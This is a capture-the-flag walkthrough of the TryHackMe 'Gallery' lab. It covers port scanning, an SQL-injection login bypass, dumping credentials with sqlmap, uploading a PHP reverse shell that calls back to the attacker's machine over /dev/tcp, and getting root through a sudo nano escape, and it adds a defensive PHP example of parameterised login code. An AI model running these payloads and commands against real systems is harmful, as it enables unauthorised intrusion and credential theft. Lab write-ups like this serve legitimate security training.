Gallery
Room Link: https://tryhackme.com/room/gallery666
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
TCP/8080 - HTTP
Kali
gobuster dir -u http://$VICTIM:8080 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt --wildcard
TCP/80 - HTTP

SQL Injection
SQL injection worked on the username field of the login form
Username: 1' or '1'='1'-- -
Password: anything

We found two databases
Kali
sudo sqlmap -r request.req --dbs
Get tables
Kali
sudo sqlmap -r request.req -D gallery_db --tables
Get fields for table users
Kali
sudo sqlmap -r request.req -D gallery_db -T users --columns
Get values of the username and password fields. I couldn't crack the hash.
Kali
sudo sqlmap -r request.req -D gallery_db -T users -C username,password --dump
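For the defensive side of the bypass above: the tautology works because the username is spliced straight into the SQL string. The following is an added example, not code from the room or this writeup; it shows that vulnerable pattern next to a fixed version that binds the parameter and checks the password with password_verify(). The table and column names come from the sqlmap output above; the $pdo connection handle is assumed.

```php
<?php
// Added example: vulnerable login versus hardened login for the users table
// enumerated above (columns username, password). $pdo is an assumed PDO handle.

// Vulnerable: input is concatenated into the query. A username of
// 1' or '1'='1'-- - turns the WHERE clause into a tautology and the
// trailing comment removes the password check entirely.
function login_vulnerable(PDO $pdo, string $username, string $password): bool
{
    $sql = "SELECT id FROM users WHERE username = '$username' AND password = '$password'";
    $row = $pdo->query($sql)->fetch();
    return $row !== false;
}

// Hardened: the username is a bound parameter, so quotes and comment
// sequences are treated as data, not SQL syntax. The password is never
// compared inside SQL; the stored value is a password_hash() digest and is
// checked with password_verify(), which also defeats offline dumps like the
// one obtained above being reused directly as credentials.
function login_hardened(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT password FROM users WHERE username = :u LIMIT 1');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false;
    }
    return password_verify($password, $row['password']);
}

// When creating or resetting accounts, store only the digest:
//   $hash = password_hash($plaintext, PASSWORD_DEFAULT);
// Disabling emulated prepares (PDO::ATTR_EMULATE_PREPARES => false) makes the
// driver send real server-side prepared statements.
```

Running the sqlmap request from this writeup against the hardened version returns no injectable parameter, because the quote in the payload never reaches the SQL parser as syntax.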
Initial Shell
I was able to upload a php reverse shell instead of an image
Kali
nc -lvnp 443
revshell.php code
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/$KALI/443 0>&1'");
?>
Upgrade the shell to a full TTY (autocomplete, job control)
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
We found a list of mike's passwords in a file called accounts, and another password in the bash history


Victim
su mike
Password: b3stpassw0rdbr0xx
Privilege Escalation
Exploit: https://gtfobins.github.io/gtfobins/nano/
mike is able to run a script as root with NOPASSWD. Looking at the script, there are a few options to select; one of them opens nano, which we can use to get a root shell. I also noticed my terminal would not open nano, so I exported TERM as xterm.
Victim
sudo -l
export TERM="xterm"

Victim
sudo /bin/bash /opt/rootkit.sh
^R^X
reset; sh 1>&0 2>&0
